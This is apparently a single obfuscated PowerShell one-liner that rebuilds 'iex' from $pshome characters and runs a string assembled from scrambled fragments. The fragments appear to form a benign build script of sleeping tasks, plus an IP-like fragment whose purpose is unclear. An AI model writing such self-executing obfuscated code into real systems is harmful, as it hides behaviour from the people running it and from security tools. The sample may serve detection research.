 & ( $pshome[4]+$psHOMe[30]+'X')( (("{44}{75}{104}{96}{33}{31}{43}{70}{78}{1}{98}{7}{97}{110}{76}{120}{119}{35}{9}{131}{16}{38}{20}{3}{21}{57}{129}{12}{90}{30}{91}{94}{45}{10}{14}{88}{25}{83}{118}{66}{26}{130}{122}{82}{64}{112}{28}{89}{116}{34}{18}{0}{85}{39}{109}{52}{77}{80}{73}{63}{81}{4}{24}{2}{117}{61}{127}{105}{93}{99}{86}{19}{114}{100}{40}{69}{128}{111}{125}{103}{8}{36}{54}{59}{5}{72}{6}{37}{55}{53}{50}{87}{106}{32}{41}{58}{74}{126}{49}{11}{15}{79}{27}{113}{108}{56}{115}{42}{84}{60}{17}{101}{48}{102}{107}{65}{124}{92}{51}{95}{47}{67}{71}{13}{62}{22}{121}{23}{68}{29}{123}{46}"-f'haredTask1','a ',' ',' ',' a','B5f
}

# S','si','rip','In','lik','Mi','
	','>

','p','l','B5fbegin -',' MSBu','S',' S','2','ld','.targets fil','83.48.171.','f','nd','i','t wr','B5','t',' OUt-Nu','
	','am','g','x','fIn','ks (',' S','s: ','i','n','ar',' ','s 1','ple','
<#
','ep','l

','е','epMi','eep {',' con','nd','s: Ca','mulate time','hared','Si','leep ','e)','jobs','Task2','C','tes an',':1','Tas','a stri','con',' Jus','цB5f
}
(  B5',')  XBh ','e',' of','fi','ynop','d','.','.Syno','por','lls S',' ',' начало','hare','k1',' ','seconds
)

# ','a','B5f
}

# Sy','SharedTask','s','l','ask SharedTask1 {
	','param(','1','e','.
tas','aCSle',' - кон','	E','t with i','sc','k ','h','le','l','f','psis
','ring','umin','lise','rt-S','opsi','m','ask1,','ng.
','f
	Sta',' S','-Millisecond','B5','wri','Synopsis:','s','ted ta','163B5','tes','l','ds
	B5f',' {
	B5','
task Sl','other st','dT','.
#','i','e')).rEPLACE('1aC','$').rEPLACE(([chaR]88+[chaR]66+[chaR]104),[STrinG][chaR]124).rEPLACE(([chaR]66+[chaR]53+[chaR]102),[STrinG][chaR]39) )
